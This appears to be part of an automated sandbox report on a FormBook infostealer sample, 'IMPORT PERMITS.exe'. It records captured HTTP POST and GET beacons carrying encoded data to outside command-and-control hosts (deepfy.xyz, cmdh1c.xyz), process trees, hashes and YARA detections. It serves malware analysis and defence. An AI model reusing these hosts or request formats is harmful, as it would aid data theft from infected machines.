                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                              Nov 2, 2024 08:14:28.163512945 CET | 271 | IN
                                                                                                                              Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              41 | 192.168.2.4 | 49381 | 199.59.243.227 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:14:33.409437895 CET | 777 | OUT | POST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=o/ybd3tYUBND9rpfZaGKTiMyWfGHqAXTM15xcOngtJZpzKQZMdUUraitMbkHVJenoiMEW9jyyX0VO0QkMASwErP7u5HRCdbsqEy837OsznKuBN8so4pt5d9Umy4F81osaaurri483gw17jU2Cb0BEoA5FoQRqF4ib5P52We7Em4Se8BfqpvSWuJ1E8/8/cWw5w==
                                                                                                                              Nov 2, 2024 08:14:34.038485050 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:33 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: 058ab3fb-7776-4d31-8c74-5419a713c15d
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=058ab3fb-7776-4d31-8c74-5419a713c15d; expires=Sat, 02 Nov 2024 07:29:33 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                              Nov 2, 2024 08:14:34.038499117 CET | 563 | IN
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDU4YWIzZmItNzc3Ni00ZDMxLThjNzQtNTQxOWE3MTNjMTVkIiwicGFnZV90aW1lIjoxNzMwNTMxNj


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              42 | 192.168.2.4 | 49382 | 199.59.243.227 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:14:35.945405960 CET | 797 | OUT | POST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=o/ybd3tYUBND9LZfb9qKEyMxKPGHxwXXM11xcMLwt/BpyqgZPcUUqaitD7keKZe8oiB7W/3yyXwVOwckN3m/F7P52JHTftbsqEy839iCzniuA9MspZpq399Vwi4F2VooaaudrnYW3ls17mw2bq0GNoBTBoRfuQVZVYya/xilay8rSaMF7YOFEutGZ72Iyfr5i2P6YmNZCrpWO6DBakCSRog=
Nov 2, 2024 08:14:36.590734005 CET    1236    IN    HTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:36 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: f52eec43-941c-4e26-86d7-ab998fc3cdc4
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=f52eec43-941c-4e26-86d7-ab998fc3cdc4; expires=Sat, 02 Nov 2024 07:29:36 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 2, 2024 08:14:36.590749025 CET    563    IN
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjUyZWVjNDMtOTQxYy00ZTI2LTg2ZDctYWI5OThmYzNjZGM0IiwicGFnZV90aW1lIjoxNzMwNTMxNj


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
43            192.168.2.4    49383          199.59.243.227    80                  3512    C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp    Bytes transferred    Direction    Data
Nov 2, 2024 08:14:38.516943932 CET    10879    OUT    POST /t7p4/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Origin: http://www.deepfy.xyz
                                                                                                                              Referer: http://www.deepfy.xyz/t7p4/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Data Ascii: Z0WTZ= [TRUNCATED]
Nov 2, 2024 08:14:39.165965080 CET    1236    IN    HTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:38 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1110
                                                                                                                              x-request-id: f7f18940-2233-4e27-84bb-8bafcd482ab5
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==
                                                                                                                              set-cookie: parking_session=f7f18940-2233-4e27-84bb-8bafcd482ab5; expires=Sat, 02 Nov 2024 07:29:39 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fjV27Ur2nceysXGoP019A2vWIyXowq3632FW+9nqZ7qYEY/H8fTHe6OMohj+IkMNoMsdsNd0QZLtc6ZWBwrwFA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 2, 2024 08:14:39.165981054 CET    563    IN
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjdmMTg5NDAtMjIzMy00ZTI3LTg0YmItOGJhZmNkNDgyYWI1IiwicGFnZV90aW1lIjoxNzMwNTMxNj


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
44            192.168.2.4    49384          199.59.243.227    80                  3512    C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp    Bytes transferred    Direction    Data
Nov 2, 2024 08:14:41.103035927 CET    523    OUT    GET /t7p4/?SJuP9=UPQLWRgHAD_&Z0WTZ=l9a7eDheKRZy9bhcTeCHdToYa6mt3ij4C0pbULzToM8sx4gmKc4u2ZHXAvhfaYH7/T0zUvL9+kkqYwdWGnSBKq2rvPWRIuzqlymkkYj2zkimPtA3jZhNuM4= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.deepfy.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Nov 2, 2024 08:14:41.739500046 CET    1236    IN    HTTP/1.1 200 OK
                                                                                                                              date: Sat, 02 Nov 2024 07:14:41 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1462
                                                                                                                              x-request-id: 77f304d7-c0d6-4acd-8309-dca59f2a8b9c
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AjafRKlUexXON4xiP3zBdseDRd1K/z6td1OAtELXMiyGVUro4fyGxkRWyKJCH0z9ZhnyKACPtRT7AmSvYbtTdw==
                                                                                                                              set-cookie: parking_session=77f304d7-c0d6-4acd-8309-dca59f2a8b9c; expires=Sat, 02 Nov 2024 07:29:41 GMT; path=/
                                                                                                                              connection: close
                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AjafRKlUexXON4xiP3zBdseDRd1K/z6td1OAtELXMiyGVUro4fyGxkRWyKJCH0z9ZhnyKACPtRT7AmSvYbtTdw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Nov 2, 2024 08:14:41.739518881 CET    915    IN
                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzdmMzA0ZDctYzBkNi00YWNkLTgzMDktZGNhNTlmMmE4YjljIiwicGFnZV90aW1lIjoxNzMwNTMxNj


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
45            192.168.2.4    49385          103.233.82.58     80                  3512    C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp    Bytes transferred    Direction    Data
Nov 2, 2024 08:14:47.393448114 CET    777    OUT    POST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 202
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=RLNhMP4PQQLRIRVE9rUhyR9JUxapmD846yfWaqXbpNTWTNSm0AmtmYSeRcDRAioibKdopEkb4TuLHExe2lXoG4OkmNBQDzAqVe8FHjb49/CYnm4uNOfYWcKmhMDHgWKchCQCIgL/m1ObY3ZHWqgzDiTXnmHVNrEYbeRZgMP6xfv00l4zH0mqSnZ9nb/gxkxWtw==


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
46            192.168.2.4    49386          103.233.82.58     80                  3512    C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp    Bytes transferred    Direction    Data
Nov 2, 2024 08:14:49.933433056 CET    797    OUT    POST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 222
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Data Ascii: Z0WTZ=RLNhMP4PQQLRHRlE/MAhnh9KYRapvj8C6yTWarTLo5/WQsimuFStr4Sea8DUEiopbKROpBcb4TqLHEBe2WPrUYOm/9BWHzAqVe8FHnyd9/aYnyEuXvfbb8KlkMDHxGKYhCQgIhWqmzCbY1xHR+00ayTRpGGyMb1rcOkGiqHN8dDV8D1pWFH9An9O6c2U8nMf20MArzOCN6Qs20d2/pV+AfA=


Session ID    Source IP      Source Port    Destination IP    Destination Port    PID     Process
47            192.168.2.4    49387          103.233.82.58     80                  3512    C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
Timestamp    Bytes transferred    Direction    Data
Nov 2, 2024 08:14:52.480575085 CET    3708    OUT    POST /6byd/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Origin: http://www.cmdh1c.xyz
                                                                                                                              Referer: http://www.cmdh1c.xyz/6byd/
                                                                                                                              Content-Length: 10302
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
Data Ascii: Z0WTZ= [TRUNCATED]
                                                                                                                              Nov 2, 2024 08:14:52.480614901 CET7171OUTData Raw: 50 36 36 66 42 54 6e 4c 31 6c 79 65 65 34 2b 41 44 53 4f 72 70 57 6a 64 48 33 63 2f 46 45 79 6b 78 38 64 6e 54 50 6d 43 71 55 75 67 57 34 64 30 4e 67 61 6f 38 62 33 39 32 64 79 51 47 46 43 42 34 5a 6f 72 6a 4a 77 4e 69 2b 68 5a 5a 50 4a 68 30 62
                                                                                                                              Data Ascii: P66fBTnL1lyee4+ADSOrpWjdH3c/FEykx8dnTPmCqUugW4d0Ngao8b392dyQGFCB4ZorjJwNi+hZZPJh0bg+WwL/nhI/D6PSFMSmca2lrd94sxPGyZy6yzuYhpDPccua4MmX5Ng/FN1j+VqW/FUyzOxOcVlihckUH7bkUytmzEAzrCEGzNuUakQgy/dUEIHD0SsGT3ESPdC37Ey3Hrh+X9Eh9Q7KDulaUN5+cFiS32l1GjWmfjb


                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                              48 | 192.168.2.4 | 49388 | 103.233.82.58 | 80 | 3512 | C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                              Nov 2, 2024 08:14:55.020785093 CET | 523 | OUT | GET /6byd/?Z0WTZ=cJlBP4gdQg33LxRaxIBB9TpDVwunrRcR6TPzX8fihpDKfN+C3z32iLCDUP2OAgtSF65Fjxsz3xegGgg43kjMMLGB+pU0EQVXDohFVmD6n/q0/xsVCvDFB+8=&SJuP9=UPQLWRgHAD_ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.cmdh1c.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Linux; U; Android 4.1.1; pt-br; Positivo Ypy L1050 Build/JRO03H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
                                                                                                                              Nov 2, 2024 08:14:56.642805099 CET | 320 | IN | HTTP/1.1 404 Not Found
                                                                                                                              Server: nginx
                                                                                                                              Date: Sat, 02 Nov 2024 07:14:48 GMT
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Content-Length: 162
                                                                                                                              Connection: close
                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                              Target ID:0
                                                                                                                              Start time:03:10:54
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\IMPORT PERMITS.exe"
                                                                                                                              Imagebase:0x5e0000
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5 hash:B648DB78EAC01C6C7311E34D232B4ED7
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:03:11:03
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Users\user\Desktop\IMPORT PERMITS.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\Desktop\IMPORT PERMITS.exe"
                                                                                                                              Imagebase:0x920000
                                                                                                                              File size:775'168 bytes
                                                                                                                              MD5 hash:B648DB78EAC01C6C7311E34D232B4ED7
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2056520278.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2058360059.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2058495171.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:03:11:26
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe"
                                                                                                                              Imagebase:0x710000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4121787054.0000000004A50000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:7
                                                                                                                              Start time:03:11:28
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Windows\SysWOW64\PATHPING.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Windows\SysWOW64\PATHPING.EXE"
                                                                                                                              Imagebase:0x920000
                                                                                                                              File size:16'896 bytes
                                                                                                                              MD5 hash:078AD26F906EF2AC1661FCAC84084256
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4121846462.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4120631323.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4121706840.00000000008C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:false

                                                                                                                              Target ID:8
                                                                                                                              Start time:03:11:41
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\YMJxZZmavOOTTWIQtgQujZlAaYvopMeOkXHcJtLPwiiYdskELLagnyeGTcrIUazJrFXDStrcKReOUIo\gKZXbGXeVZyo.exe"
                                                                                                                              Imagebase:0x710000
                                                                                                                              File size:140'800 bytes
                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4123927554.00000000057E0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              Target ID:9
                                                                                                                              Start time:03:11:54
                                                                                                                              Start date:02/11/2024
                                                                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                              Imagebase:0x7ff6bf500000
                                                                                                                              File size:676'768 bytes
                                                                                                                              MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:9.1%
                                                                                                                                Dynamic/Decrypted Code Coverage:100%
